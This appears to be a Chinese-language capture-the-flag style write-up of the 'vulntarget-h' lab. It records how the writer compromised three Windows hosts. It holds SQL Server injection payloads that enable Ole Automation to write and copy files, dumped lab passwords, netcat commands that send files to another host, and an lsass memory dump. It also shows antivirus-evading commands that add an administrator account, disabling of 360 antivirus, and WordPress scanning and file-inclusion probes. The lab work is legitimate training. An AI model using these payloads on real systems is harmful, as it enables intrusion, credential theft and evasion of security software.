0x01 环境
vulntarget-h拓扑
windows10:mimataichangjibuzhu windows7:mimataichangyebuhao win2008: Winmimayijingwangjile@ sa:Adminweishenmezhegehaiyaomima@ wordpresss:root:zhehaiyaomima?
相关漏洞技术
sql注入、文件包含、命令执行,免杀等漏洞利用、隧道代理等
本地环境配置
win2008 > ip : 192.168.153.130 192.168.1.102 win7 > ip :192.168.153.128 win10 > ip : 192.168.153.129
0x02 打靶记录
Win2008
打开这个站点看一下
note: use querystring value user_id to search for details of a particular users 备注:使用querystring值user_id查询特定用户的详细信息
既然都给提示了,那么就直接SQL注入吧
iis + aspx + Access / SQLServer 数据库
http://192.168.1.102/?user_id=1 and exists(select * from sysobjects)
http://192.168.1.102/?user_id=1 and (select IS_SRVROLEMEMBER('sysadmin')%3E0--
user_id=1;declare @f int,@g int; exec sp_oacreate 'Scripting.FileSystemObject',@f output; EXEC SP_OAMETHOD @f,'CreateTextFile',@f OUTPUT,'C:\inetpub\wwwroot\11.txt'; EXEC sp_oamethod @f,'WriteLine',null,'aaaaac';
exec sp_configure 'show advanced options', 1;RECONFIGURE; exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE; declare @o int; exec sp_oacreate 'scripting.filesystemobject', @o out; exec sp_oamethod @o, 'copyfile',null,'C:\Windows\System32\inetsrv\config\applicationHost.config' ,'C:\inetpub\custerr\zh-CN\404.htm';
访问一个不存在的目录,可以获得一个网站路径:
user_id=1;declare @f int,@g int; exec sp_oacreate 'Scripting.FileSystemObject',@f output; EXEC SP_OAMETHOD @f,'CreateTextFile',@f OUTPUT,'C:\inetpub\edrfgyhujikopl\11.txt'; EXEC sp_oamethod @f,'WriteLine',null,'aaaaac';
成功写入
* Username : win2008 * Domain : WIN-7DSM1JVE9PO * Password : Winmimayijingwangjile@
* Username : Administrator * Domain : WIN-7DSM1JVE9PO * Password : Adminmimayijingwangjile@
3389之后先直接果断地干掉360,先关闭主动防御:
windows7
双网卡
接收:nc -lvvp 1234 < 1.txt
发送:nc 127.0.0.1 1234 < 1.txt shell=c:/phpstudy_pro/nc64.exe 192.168.153.130 1234 < c:/phpstudy_pro/COM/a.txt
shell=system('c:/phpstudy_pro/gt.exe "c:/phpstudy_pro/pp.exe -accepteula -ma lsass.exe lsass.dmp"');
shell=system('c:/phpstudy_pro/gt.exe "net use"r" nami nanami_@_123.. /add"'); shell=system('c:/phpstudy_pro/gt.exe "net localgro"u"p administrators nami /add"'); shell=system('c:/phpstudy_pro/gt.exe "net localgroup administrators"');
windows10
这个win10设置开机自启web服务,记得点开一下,上面没有扫描这个地址,就是忘记开启phpstudy了。这里的IP地址不能改变必须是129,它web网站都是适应的设置好的IP
proxychains wpscan --url http://192.168.153.129/ --enumerate vp # 只枚举有漏洞的插件
proxychains wpscan --url http://192.168.153.129/ --enumerate vt # 只枚举存在漏洞的主题
使用插件扫描到XML-RPC漏洞,来验证一下:
POST /xmlrpc.php HTTP/1.1 Host: 192.168.153.129 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Content-Length: 0 Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 <methodCall> <methodName>system.listMethods</methodName> <params></params> </methodCall>
Title: Mail Masta WP Local File Inclusion
首先测试了一下是否存在远程文件包含,因为我已经拿下了win7这台机器,而且win10那台机器没法写文件。但是没有利用成功,应该是没有开启远程文件包含:
<?php phpinfo();
0x03 总结
拿下win10这个靶场也就打完了,可是打的过程中感觉怪怪的。就是杀毒环境,这个靶场的杀毒环境检测不是很严格,普通的免杀或者命令绕过就可以直接使用,甚至df都不检测执行的命令了,但是在抓密码的时候还是杀掉了我读取的lsass.dmp文件。在win10机器使用了一个smb绕过远程文件包含的技术,这个之前没有接触过,学到了。
